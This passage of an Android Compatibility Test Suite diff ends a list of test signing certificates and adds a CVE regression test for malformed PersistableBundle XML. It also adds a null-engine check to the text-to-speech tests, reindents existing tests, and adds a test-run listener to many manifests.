+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_art));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_bluetooth));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_btservices));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_car_framework));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_cellbroadcast));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_compos));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_connectivity_resources));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_extservices));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_geotz));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_core_permissions));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_power));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_sensors));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_thermal));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_usb));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_vibrator));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_wifi));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hotspot2_osulogin));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_i18n));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_ipsec));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_mediaprovider));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_neuralnetworks));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_os_statsd));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_permission));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_rkpd));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_runtime));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_safetycenter_resources));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_sdkext));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_uwb));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_uwb_resources));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_vibrator_drv2624));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_vibrator_sunfish));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_virt));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_vndk));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_wifi));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_wifi_dialog));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_wifi_resources));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_google_cf_apex));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_google_emulated_camera_provider_hal));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_appsearch_helper_cert_a));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_appsearch_helper_cert_b));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_appsearch_hosttest_helper_cert_a));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_appsearch_hosttest_helper_cert_b));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_blob_helper_cert));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_blob_helper_cert2));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_keyset_test_a));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_keyset_test_b));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_keyset_test_c));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_keyset_test_ec_a));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_net_app));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_testkey1));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_testkey2));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cts_uicc_2021));
+        wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256));
+        wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256_2));
+        wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256_3));
+        wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256_4));
+        wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256_5));
+        wellKnownSignatures.add(getSignature(R.raw.sig_keyset_A));
+        wellKnownSignatures.add(getSignature(R.raw.sig_keyset_B));
+        wellKnownSignatures.add(getSignature(R.raw.sig_rro_remounted_test_a));
+        wellKnownSignatures.add(getSignature(R.raw.sig_rsa_2048));
+        wellKnownSignatures.add(getSignature(R.raw.sig_sdk_sandbox));
+        wellKnownSignatures.add(getSignature(R.raw.sig_security_cts_test_cert));
+        wellKnownSignatures.add(getSignature(R.raw.sig_shell_as_test_app_key));
+        wellKnownSignatures.add(getSignature(R.raw.sig_test_cert_1));
+        wellKnownSignatures.add(getSignature(R.raw.sig_test_cert_2));
+        wellKnownSignatures.add(getSignature(R.raw.sig_test_cert_3));
+        wellKnownSignatures.add(getSignature(R.raw.sig_test_cert_4));
+        wellKnownSignatures.add(getSignature(R.raw.sig_testcert));
+        wellKnownSignatures.add(getSignature(R.raw.sig_unit_test));
         return wellKnownSignatures;
     }
 
diff --git a/tests/tests/security/src/android/security/cts/PersistableBundleTest.java b/tests/tests/security/src/android/security/cts/PersistableBundleTest.java
new file mode 100644
index 0000000..e7780e4
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/PersistableBundleTest.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertFalse;
+
+import android.os.PersistableBundle;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.ext.junit.runners.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.ByteArrayInputStream;
+
+@RunWith(AndroidJUnit4.class)
+public class PersistableBundleTest extends StsExtraBusinessLogicTestCase {
+
+    @AsbSecurityTest(cveBugId = 247513680)
+    @Test
+    public void testReadFromStream_invalidType() throws Exception {
+        String input = "<bundle><string name=\"key\">value</string>"
+                + "<byte-array name=\"invalid\" num=\"2\">ffff</byte-array></bundle>";
+        ByteArrayInputStream inputStream = new ByteArrayInputStream(input.getBytes());
+
+        // Reading from the stream with invalid type should not throw an exception
+        PersistableBundle restoredBundle = PersistableBundle.readFromStream(inputStream);
+
+        // verify invalid type is ignored
+        assertFalse(restoredBundle.containsKey("invalid"));
+        // verify valid type exists
+        assertEquals("value", restoredBundle.getString("key"));
+    }
+}
diff --git a/tests/tests/selinux/selinuxEphemeral/AndroidManifest.xml b/tests/tests/selinux/selinuxEphemeral/AndroidManifest.xml
index 4c62187..9e2deeb 100644
--- a/tests/tests/selinux/selinuxEphemeral/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxEphemeral/AndroidManifest.xml
@@ -29,6 +29,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.selinuxephemeral.cts"
                      android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk25/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk25/AndroidManifest.xml
index efdc4bd..da08049 100644
--- a/tests/tests/selinux/selinuxTargetSdk25/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk25/AndroidManifest.xml
@@ -29,6 +29,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.selinuxtargetsdk25.cts"
                      android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk27/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk27/AndroidManifest.xml
index 8449ea9..b94757c 100644
--- a/tests/tests/selinux/selinuxTargetSdk27/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk27/AndroidManifest.xml
@@ -33,6 +33,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.selinuxtargetsdk27.cts"
                      android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk28/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk28/AndroidManifest.xml
index b6b1baa..97d15c5 100644
--- a/tests/tests/selinux/selinuxTargetSdk28/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk28/AndroidManifest.xml
@@ -33,6 +33,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.selinuxtargetsdk28.cts"
                      android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk29/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk29/AndroidManifest.xml
index b37d05b..3e4e7c4 100644
--- a/tests/tests/selinux/selinuxTargetSdk29/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk29/AndroidManifest.xml
@@ -33,6 +33,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.selinuxtargetsdk29.cts"
                      android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk30/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk30/AndroidManifest.xml
index 80d5e6c..9b40d00 100644
--- a/tests/tests/selinux/selinuxTargetSdk30/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk30/AndroidManifest.xml
@@ -33,6 +33,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.selinuxtargetsdk30.cts"
                      android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdkCurrent/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdkCurrent/AndroidManifest.xml
index bce1b28..a209894 100644
--- a/tests/tests/selinux/selinuxTargetSdkCurrent/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdkCurrent/AndroidManifest.xml
@@ -30,6 +30,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.selinuxtargetsdkcurrent.cts"
                      android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/sensorprivacy/AndroidManifest.xml b/tests/tests/sensorprivacy/AndroidManifest.xml
index 0fcfa2c..7b53910 100644
--- a/tests/tests/sensorprivacy/AndroidManifest.xml
+++ b/tests/tests/sensorprivacy/AndroidManifest.xml
@@ -27,6 +27,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.sensorprivacy.cts"
          android:label="CTS tests of android.sensorprivacy">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/settings/AndroidManifest.xml b/tests/tests/settings/AndroidManifest.xml
index b1d3931..bc50a58 100644
--- a/tests/tests/settings/AndroidManifest.xml
+++ b/tests/tests/settings/AndroidManifest.xml
@@ -45,5 +45,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.settings.cts"
          android:label="CTS tests of android Settings app">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/sharesheet/AndroidManifest.xml b/tests/tests/sharesheet/AndroidManifest.xml
index 13f0163..f313997 100644
--- a/tests/tests/sharesheet/AndroidManifest.xml
+++ b/tests/tests/sharesheet/AndroidManifest.xml
@@ -79,6 +79,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.sharesheet.cts"
          android:label="CTS tests of android.sharesheet">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/shortcutmanager/AndroidManifest.xml b/tests/tests/shortcutmanager/AndroidManifest.xml
index 6feea73..182a1d8 100755
--- a/tests/tests/shortcutmanager/AndroidManifest.xml
+++ b/tests/tests/shortcutmanager/AndroidManifest.xml
@@ -67,6 +67,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.content.pm.cts.shortcutmanager"
          android:label="CTS tests for ShortcutManager">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/simphonebookprovider/AndroidManifest.xml b/tests/tests/simphonebookprovider/AndroidManifest.xml
index 9dc1559..ca62323 100644
--- a/tests/tests/simphonebookprovider/AndroidManifest.xml
+++ b/tests/tests/simphonebookprovider/AndroidManifest.xml
@@ -30,6 +30,9 @@
     <instrumentation
         android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.provider.cts.simphonebook">
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
     <uses-feature android:name="android.hardware.telephony" />
diff --git a/tests/tests/slice/AndroidManifest.xml b/tests/tests/slice/AndroidManifest.xml
index 88fe774..668ae0a 100644
--- a/tests/tests/slice/AndroidManifest.xml
+++ b/tests/tests/slice/AndroidManifest.xml
@@ -52,6 +52,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.slice.cts"
          android:label="CTS tests of android.slice">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/soundtrigger/AndroidManifest.xml b/tests/tests/soundtrigger/AndroidManifest.xml
index e9c6541..cfdc69f 100644
--- a/tests/tests/soundtrigger/AndroidManifest.xml
+++ b/tests/tests/soundtrigger/AndroidManifest.xml
@@ -25,6 +25,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.soundtrigger.cts"
                      android:label="CTS tests of android.soundtrigger">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/tests/speech/AndroidManifest.xml b/tests/tests/speech/AndroidManifest.xml
index f801a2a..5043d03 100755
--- a/tests/tests/speech/AndroidManifest.xml
+++ b/tests/tests/speech/AndroidManifest.xml
@@ -46,6 +46,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.speech.tts.cts"
          android:label="CTS tests of android.speech">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/speech/src/android/speech/tts/cts/TextToSpeechServiceTest.java b/tests/tests/speech/src/android/speech/tts/cts/TextToSpeechServiceTest.java
index 869b7e4..97c0c8a 100644
--- a/tests/tests/speech/src/android/speech/tts/cts/TextToSpeechServiceTest.java
+++ b/tests/tests/speech/src/android/speech/tts/cts/TextToSpeechServiceTest.java
@@ -15,21 +15,30 @@
  */
 package android.speech.tts.cts;
 
+import android.content.Context;
 import android.media.AudioAttributes;
 import android.net.Uri;
 import android.os.Bundle;
 import android.os.ConditionVariable;
-import android.os.Environment;
+import android.os.IBinder;
 import android.os.ParcelFileDescriptor;
+import android.os.ServiceManager;
+import android.speech.tts.ITextToSpeechManager;
+import android.speech.tts.ITextToSpeechSession;
+import android.speech.tts.ITextToSpeechSessionCallback;
 import android.speech.tts.TextToSpeech;
 import android.test.AndroidTestCase;
 
+import com.google.common.util.concurrent.SettableFuture;
+
 import java.io.File;
 import java.io.FileOutputStream;
 import java.util.HashMap;
-import java.util.Map;
 import java.util.List;
 import java.util.Locale;
+import java.util.Map;
+import java.util.Objects;
+import java.util.concurrent.TimeUnit;
 
 /**
  * Tests for {@link android.speech.tts.TextToSpeechService} using StubTextToSpeechService.
@@ -60,6 +69,37 @@
         return mTts.getTts();
     }
 
+    public void testNullEngine() throws Exception {
+        IBinder binder = ServiceManager.getService(Context.TEXT_TO_SPEECH_MANAGER_SERVICE);
+        ITextToSpeechManager manager =
+                Objects.requireNonNull(ITextToSpeechManager.Stub.asInterface(binder));
+        // could use a spy instead but we run into "cannot proxy inaccessible class" issues
+        final SettableFuture<String> errorMsg = SettableFuture.create();
+        final SettableFuture<Void> connected = SettableFuture.create();
+        final SettableFuture<Void> disconnected = SettableFuture.create();
+        ITextToSpeechSessionCallback callback =
+                new ITextToSpeechSessionCallback.Stub() {
+                    @Override
+                    public void onConnected(ITextToSpeechSession session, IBinder serviceBinder) {
+                        connected.set(null);
+                    }
+
+                    @Override
+                    public void onDisconnected() {
+                        disconnected.set(null);
+                    }
+
+                    @Override
+                    public void onError(String errorInfo) {
+                        errorMsg.set(errorInfo);
+                    }
+                };
+        manager.createSession(null, callback);
+        assertFalse(connected.isDone());
+        assertFalse(disconnected.isDone());
+        assertEquals("Engine cannot be null", errorMsg.get(1, TimeUnit.SECONDS));
+    }
+
     public void testSynthesizeToFile() throws Exception {
         File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
         try {
@@ -67,7 +107,7 @@
 
             int result =
                     getTts().synthesizeToFile(
-                                    UTTERANCE, createParams("mocktofile"), sampleFile.getPath());
+                            UTTERANCE, createParams("mocktofile"), sampleFile.getPath());
             verifySynthesisFile(result, mTts, sampleFile);
         } finally {
             sampleFile.delete();
@@ -84,10 +124,10 @@
 
             int result =
                     getTts().synthesizeToFile(
-                                    UTTERANCE,
-                                    params,
-                                    sampleFile,
-                                    params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
+                            UTTERANCE,
+                            params,
+                            sampleFile,
+                            params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
             verifySynthesisFile(result, mTts, sampleFile);
         } finally {
             sampleFile.delete();
@@ -101,16 +141,16 @@
             assertFalse(sampleFile.exists());
 
             ParcelFileDescriptor fileDescriptor = ParcelFileDescriptor.open(sampleFile,
-                ParcelFileDescriptor.MODE_WRITE_ONLY
-                | ParcelFileDescriptor.MODE_CREATE
-                | ParcelFileDescriptor.MODE_TRUNCATE);
+                    ParcelFileDescriptor.MODE_WRITE_ONLY
+                            | ParcelFileDescriptor.MODE_CREATE
+                            | ParcelFileDescriptor.MODE_TRUNCATE);
 
             Bundle params = createParamsBundle("mocktofile");
 
             int result =
-                getTts().synthesizeToFile(
-                    UTTERANCE, params, fileDescriptor,
-                    params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
+                    getTts().synthesizeToFile(
+                            UTTERANCE, params, fileDescriptor,
+                            params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
             verifySynthesisFile(result, mTts, sampleFile);
         } finally {
             sampleFile.delete();
@@ -119,29 +159,30 @@
     }
 
     public void testMaxSpeechInputLength() {
-      File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
-      try {
-          assertFalse(sampleFile.exists());
-          TextToSpeech tts = getTts();
+        File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
+        try {
+            assertFalse(sampleFile.exists());
+            TextToSpeech tts = getTts();
 
-          int maxLength = tts.getMaxSpeechInputLength();
-          StringBuilder sb = new StringBuilder();
-          for (int i = 0; i < maxLength; i++) {
+            int maxLength = tts.getMaxSpeechInputLength();
+            StringBuilder sb = new StringBuilder();
+            for (int i = 0; i < maxLength; i++) {
+                sb.append("c");
+            }
+            String valid = sb.toString();
             sb.append("c");
-          }
-          String valid = sb.toString();
-          sb.append("c");
-          String invalid = sb.toString();
+            String invalid = sb.toString();
 
-          assertEquals(maxLength, valid.length());
-          assertTrue(invalid.length() > maxLength);
-          assertEquals(TextToSpeech.ERROR,
-                  tts.synthesizeToFile(invalid, createParams("mockToFile"), sampleFile.getPath()));
-          assertEquals(TextToSpeech.SUCCESS,
-                  tts.synthesizeToFile(valid, createParams("mockToFile"), sampleFile.getPath()));
-      } finally {
-          sampleFile.delete();
-      }
+            assertEquals(maxLength, valid.length());
+            assertTrue(invalid.length() > maxLength);
+            assertEquals(TextToSpeech.ERROR,
+                    tts.synthesizeToFile(invalid, createParams("mockToFile"),
+                            sampleFile.getPath()));
+            assertEquals(TextToSpeech.SUCCESS,
+                    tts.synthesizeToFile(valid, createParams("mockToFile"), sampleFile.getPath()));
+        } finally {
+            sampleFile.delete();
+        }
     }
 
     public void testSpeak() throws Exception {
@@ -203,7 +244,7 @@
         try {
             assertFalse(TextToSpeechWrapper.isSoundFile(sampleFile.getPath()));
             FileOutputStream out = new FileOutputStream(sampleFile);
-            out.write(new byte[] { 0x01, 0x02 });
+            out.write(new byte[]{0x01, 0x02});
             out.close();
             assertFalse(TextToSpeechWrapper.isSoundFile(sampleFile.getPath()));
         } finally {
@@ -212,79 +253,81 @@
     }
 
     public void testAddPlayEarcon() throws Exception {
-      File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
-      try {
-        generateSampleAudio(sampleFile);
+        File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
+        try {
+            generateSampleAudio(sampleFile);
 
-        Uri sampleUri = Uri.fromFile(sampleFile);
-        assertEquals(getTts().addEarcon(EARCON_UTTERANCE, sampleFile), TextToSpeech.SUCCESS);
+            Uri sampleUri = Uri.fromFile(sampleFile);
+            assertEquals(getTts().addEarcon(EARCON_UTTERANCE, sampleFile), TextToSpeech.SUCCESS);
 
-        int result = getTts().playEarcon(EARCON_UTTERANCE,
-            TextToSpeech.QUEUE_FLUSH, createParamsBundle(EARCON_UTTERANCE), EARCON_UTTERANCE);
+            int result = getTts().playEarcon(EARCON_UTTERANCE,
+                    TextToSpeech.QUEUE_FLUSH, createParamsBundle(EARCON_UTTERANCE),
+                    EARCON_UTTERANCE);
 
-        verifyAddPlay(result, mTts, EARCON_UTTERANCE);
-      } finally {
-        sampleFile.delete();
-      }
+            verifyAddPlay(result, mTts, EARCON_UTTERANCE);
+        } finally {
+            sampleFile.delete();
+        }
     }
 
     public void testAddPlaySpeech() throws Exception {
-      File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
-      try {
-        generateSampleAudio(sampleFile);
+        File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
+        try {
+            generateSampleAudio(sampleFile);
 
-        Uri sampleUri = Uri.fromFile(sampleFile);
-        assertEquals(getTts().addSpeech(SPEECH_UTTERANCE, sampleFile), TextToSpeech.SUCCESS);
+            Uri sampleUri = Uri.fromFile(sampleFile);
+            assertEquals(getTts().addSpeech(SPEECH_UTTERANCE, sampleFile), TextToSpeech.SUCCESS);
 
-        int result = getTts().speak(SPEECH_UTTERANCE,
-            TextToSpeech.QUEUE_FLUSH, createParamsBundle(SPEECH_UTTERANCE), SPEECH_UTTERANCE);
+            int result = getTts().speak(SPEECH_UTTERANCE,
+                    TextToSpeech.QUEUE_FLUSH, createParamsBundle(SPEECH_UTTERANCE),
+                    SPEECH_UTTERANCE);
 
-        verifyAddPlay(result, mTts, SPEECH_UTTERANCE);
-      } finally {
-        sampleFile.delete();
-      }
+            verifyAddPlay(result, mTts, SPEECH_UTTERANCE);
+        } finally {
+            sampleFile.delete();
+        }
     }
 
     public void testSetLanguage() {
-      TextToSpeech tts = getTts();
+        TextToSpeech tts = getTts();
 
-      assertEquals(tts.setLanguage(null), TextToSpeech.LANG_NOT_SUPPORTED);
-      assertEquals(tts.setLanguage(new Locale("en", "US")), TextToSpeech.LANG_COUNTRY_AVAILABLE);
-      assertEquals(tts.setLanguage(new Locale("en")), TextToSpeech.LANG_AVAILABLE);
-      assertEquals(tts.setLanguage(new Locale("es", "US")), TextToSpeech.LANG_NOT_SUPPORTED);
+        assertEquals(tts.setLanguage(null), TextToSpeech.LANG_NOT_SUPPORTED);
+        assertEquals(tts.setLanguage(new Locale("en", "US")), TextToSpeech.LANG_COUNTRY_AVAILABLE);
+        assertEquals(tts.setLanguage(new Locale("en")), TextToSpeech.LANG_AVAILABLE);
+        assertEquals(tts.setLanguage(new Locale("es", "US")), TextToSpeech.LANG_NOT_SUPPORTED);
     }
 
     public void testAddAudioAttributes() {
-      TextToSpeech tts = getTts();
-      AudioAttributes attr =
-          new AudioAttributes.Builder().setUsage(AudioAttributes.USAGE_MEDIA).build();
+        TextToSpeech tts = getTts();
+        AudioAttributes attr =
+                new AudioAttributes.Builder().setUsage(AudioAttributes.USAGE_MEDIA).build();
 
-      assertEquals(tts.setAudioAttributes(null), TextToSpeech.ERROR);
-      assertEquals(tts.setAudioAttributes(attr), TextToSpeech.SUCCESS);
+        assertEquals(tts.setAudioAttributes(null), TextToSpeech.ERROR);
+        assertEquals(tts.setAudioAttributes(attr), TextToSpeech.SUCCESS);
     }
 
     private void generateSampleAudio(File sampleFile) throws Exception {
-      assertFalse(sampleFile.exists());
+        assertFalse(sampleFile.exists());
 
-      ParcelFileDescriptor fileDescriptor = ParcelFileDescriptor.open(sampleFile,
-          ParcelFileDescriptor.MODE_WRITE_ONLY
-          | ParcelFileDescriptor.MODE_CREATE
-          | ParcelFileDescriptor.MODE_TRUNCATE);
+        ParcelFileDescriptor fileDescriptor = ParcelFileDescriptor.open(sampleFile,
+                ParcelFileDescriptor.MODE_WRITE_ONLY
+                        | ParcelFileDescriptor.MODE_CREATE
+                        | ParcelFileDescriptor.MODE_TRUNCATE);
 
-      Bundle params = createParamsBundle("mocktofile");
+        Bundle params = createParamsBundle("mocktofile");
 
-      int result =
-          getTts().synthesizeToFile(
-              UTTERANCE, params, fileDescriptor,
-              params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
+        int result =
+                getTts().synthesizeToFile(
+                        UTTERANCE, params, fileDescriptor,
+                        params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
 
-      verifySynthesisFile(result, mTts, sampleFile);
+        verifySynthesisFile(result, mTts, sampleFile);
     }
 
     private void verifyAddPlay(int result, TextToSpeechWrapper mTts, String utterance)
-        throws Exception {
-      assertEquals(TextToSpeech.SUCCESS, result);
-      assertTrue(mTts.waitForComplete(utterance));
+            throws Exception {
+        assertEquals(TextToSpeech.SUCCESS, result);
+        assertTrue(mTts.waitForComplete(utterance));
     }
 
     private HashMap<String, String> createParams(String utteranceId) {
@@ -300,7 +343,7 @@
     }
 
     private void verifySynthesisFile(int result, TextToSpeechWrapper mTts, File file)
-        throws InterruptedException {
+            throws InterruptedException {
 
         assertEquals("synthesizeToFile() failed", TextToSpeech.SUCCESS, result);
 
diff --git a/tests/tests/syncmanager/AndroidManifest.xml b/tests/tests/syncmanager/AndroidManifest.xml
index bf4eb96..f456465 100755
--- a/tests/tests/syncmanager/AndroidManifest.xml
+++ b/tests/tests/syncmanager/AndroidManifest.xml
@@ -32,6 +32,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.content.syncmanager.cts"
         android:label="CTS tests for sync manager">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/taskfpscallback/AndroidManifest.xml b/tests/tests/taskfpscallback/AndroidManifest.xml
index 8a988b0..f7bd875 100644
--- a/tests/tests/taskfpscallback/AndroidManifest.xml
+++ b/tests/tests/taskfpscallback/AndroidManifest.xml
@@ -35,5 +35,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.taskfpscallback.cts"
          android:label="CTS tests of android TaskFpsCallback service">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/telecom/AndroidManifest.xml b/tests/tests/telecom/AndroidManifest.xml
index 5b73466..9c2b522 100644
--- a/tests/tests/telecom/AndroidManifest.xml
+++ b/tests/tests/telecom/AndroidManifest.xml
@@ -208,5 +208,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.telecom.cts"
          android:label="CTS tests for android.telecom package">
